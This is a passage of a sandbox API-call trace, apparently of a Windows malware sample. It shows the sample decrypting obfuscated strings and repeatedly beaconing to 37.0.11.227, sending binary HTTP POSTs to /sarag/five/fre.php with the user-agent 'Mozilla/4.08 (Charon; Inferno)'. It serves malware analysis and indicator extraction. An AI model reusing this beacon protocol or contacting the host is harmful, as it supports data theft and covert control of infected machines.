RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0179.760] GetProcessHeap () returned 0x690000 [0179.760] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0179.761] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0179.762] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0179.762] GetProcessHeap () returned 0x690000 [0179.762] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0179.762] GetProcessHeap () returned 0x690000 [0179.762] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0179.762] send (s=0x2d0, buf=0x6abd08*, len=242, flags=0) returned 242 [0179.763] send (s=0x2d0, buf=0x6aba40*, len=159, flags=0) returned 159 [0179.763] GetProcessHeap () returned 0x690000 [0179.763] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6af418 [0179.763] recv (in: s=0x2d0, buf=0x6af418, len=4048, flags=0 | out: buf=0x6af418*) returned 204 [0179.838] GetProcessHeap () returned 0x690000 [0179.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0179.839] GetProcessHeap () returned 0x690000 [0179.839] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0179.839] GetProcessHeap () returned 0x690000 [0179.839] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0179.840] GetProcessHeap () returned 0x690000 [0179.840] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0179.840] closesocket (s=0x2d0) returned 0 [0179.841] GetProcessHeap () returned 0x690000 [0179.841] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0179.841] GetProcessHeap () returned 0x690000 [0179.841] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0179.841] GetProcessHeap () returned 0x690000 [0179.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0179.842] GetProcessHeap () returned 0x690000 [0179.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0179.842] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6af418, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe08) returned 0x2d0 [0179.845] Sleep (dwMilliseconds=0xea60) [0179.848] GetProcessHeap () returned 0x690000 [0179.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0179.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.849] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.856] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0179.867] GetProcessHeap () returned 0x690000 [0179.867] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0179.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.868] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0179.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.869] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.870] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.870] GetProcessHeap () returned 0x690000 [0179.871] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0179.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.872] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0179.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.873] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0179.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.874] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0179.874] GetProcessHeap () returned 0x690000 [0179.874] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0179.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.875] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0179.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.883] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0179.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.884] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0179.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.886] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0179.886] GetProcessHeap () returned 0x690000 [0179.886] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0179.886] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0179.886] GetProcessHeap () returned 0x690000 [0179.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0179.886] GetProcessHeap () returned 0x690000 [0179.887] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0179.887] GetProcessHeap () returned 0x690000 [0179.887] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0179.887] GetProcessHeap () returned 0x690000 [0179.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0179.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.888] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.897] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0179.906] GetProcessHeap () returned 0x690000 [0179.906] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0179.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.908] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0179.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.909] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.910] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.910] GetProcessHeap () returned 0x690000 [0179.910] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0179.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.912] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0179.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.913] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0179.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.914] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0179.914] GetProcessHeap () returned 0x690000 [0179.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0179.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.915] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0179.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.916] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0179.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.917] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0179.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.919] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0179.919] GetProcessHeap () returned 0x690000 [0179.919] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0179.919] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9d98*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0179.919] GetProcessHeap () returned 0x690000 [0179.919] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0179.919] socket (af=2, type=1, protocol=6) returned 0x2d4 [0179.919] connect (s=0x2d4, name=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0179.954] FreeAddrInfoW (pAddrInfo=0x6a9d98*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0179.954] GetProcessHeap () returned 0x690000 [0179.954] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0179.954] GetProcessHeap () returned 0x690000 [0179.954] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0179.955] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0179.968] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0179.968] GetProcessHeap () returned 0x690000 [0179.968] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0179.968] GetProcessHeap () returned 0x690000 [0179.968] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0179.968] GetProcessHeap () returned 0x690000 [0179.969] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0179.969] GetProcessHeap () returned 0x690000 [0179.969] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0179.969] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0179.970] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0179.970] GetProcessHeap () returned 0x690000 [0179.970] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0179.970] GetProcessHeap () returned 0x690000 [0179.971] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0179.971] send (s=0x2d4, buf=0x6abd08*, len=242, flags=0) returned 242 [0179.972] send (s=0x2d4, buf=0x6aba40*, len=159, flags=0) returned 159 [0179.972] GetProcessHeap () returned 0x690000 [0179.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6af418 [0179.972] recv (in: s=0x2d4, buf=0x6af418, len=4048, flags=0 | out: buf=0x6af418*) returned 204 [0180.051] GetProcessHeap () returned 0x690000 [0180.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0180.052] GetProcessHeap () returned 0x690000 [0180.052] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0180.052] GetProcessHeap () returned 0x690000 [0180.052] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0180.052] GetProcessHeap () returned 0x690000 [0180.053] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0180.053] closesocket (s=0x2d4) returned 0 [0180.054] GetProcessHeap () returned 0x690000 [0180.054] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0180.054] GetProcessHeap () returned 0x690000 [0180.054] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0180.054] GetProcessHeap () returned 0x690000 [0180.055] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0180.055] GetProcessHeap () returned 0x690000 [0180.055] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0180.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6af418, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf44) returned 0x2d4 [0180.073] Sleep (dwMilliseconds=0xea60) [0180.074] GetProcessHeap () returned 0x690000 [0180.074] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0180.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.076] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.086] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0180.096] GetProcessHeap () returned 0x690000 [0180.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0180.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.098] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0180.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.102] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.106] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.106] GetProcessHeap () returned 0x690000 [0180.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0180.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.107] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0180.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.108] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0180.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.110] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0180.110] GetProcessHeap () returned 0x690000 [0180.110] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0180.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.111] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0180.112] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.112] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0180.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.113] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0180.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.116] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0180.116] GetProcessHeap () returned 0x690000 [0180.116] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0180.116] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0180.117] GetProcessHeap () returned 0x690000 [0180.117] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0180.117] GetProcessHeap () returned 0x690000 [0180.117] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0180.117] GetProcessHeap () returned 0x690000 [0180.118] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0180.118] GetProcessHeap () returned 0x690000 [0180.118] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0180.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.119] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.128] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0180.135] GetProcessHeap () returned 0x690000 [0180.135] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0180.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.136] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0180.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.138] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.139] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.139] GetProcessHeap () returned 0x690000 [0180.139] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0180.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.140] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0180.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.142] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0180.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0180.143] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0180.143] GetProcessHeap () returned 0x690000 [0180.143] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0180.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.145] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0180.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.147] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0180.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.148] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0180.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.151] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0180.152] GetProcessHeap () returned 0x690000 [0180.152] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0180.152] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9b90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0180.152] GetProcessHeap () returned 0x690000 [0180.152] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0180.152] socket (af=2, type=1, protocol=6) returned 0x2d8 [0180.152] connect (s=0x2d8, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0180.179] FreeAddrInfoW (pAddrInfo=0x6a9b90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0180.179] GetProcessHeap () returned 0x690000 [0180.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0180.179] GetProcessHeap () returned 0x690000 [0180.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0180.180] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0180.181] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0180.181] GetProcessHeap () returned 0x690000 [0180.181] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0180.181] GetProcessHeap () returned 0x690000 [0180.181] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0180.181] GetProcessHeap () returned 0x690000 [0180.181] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0180.182] GetProcessHeap () returned 0x690000 [0180.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0180.182] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0180.183] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0180.183] GetProcessHeap () returned 0x690000 [0180.184] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0180.184] GetProcessHeap () returned 0x690000 [0180.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0180.184] send (s=0x2d8, buf=0x6abd08*, len=242, flags=0) returned 242 [0180.185] send (s=0x2d8, buf=0x6aba40*, len=159, flags=0) returned 159 [0180.185] GetProcessHeap () returned 0x690000 [0180.185] RtlAllocateHeap (HeapHandle=0x690000, 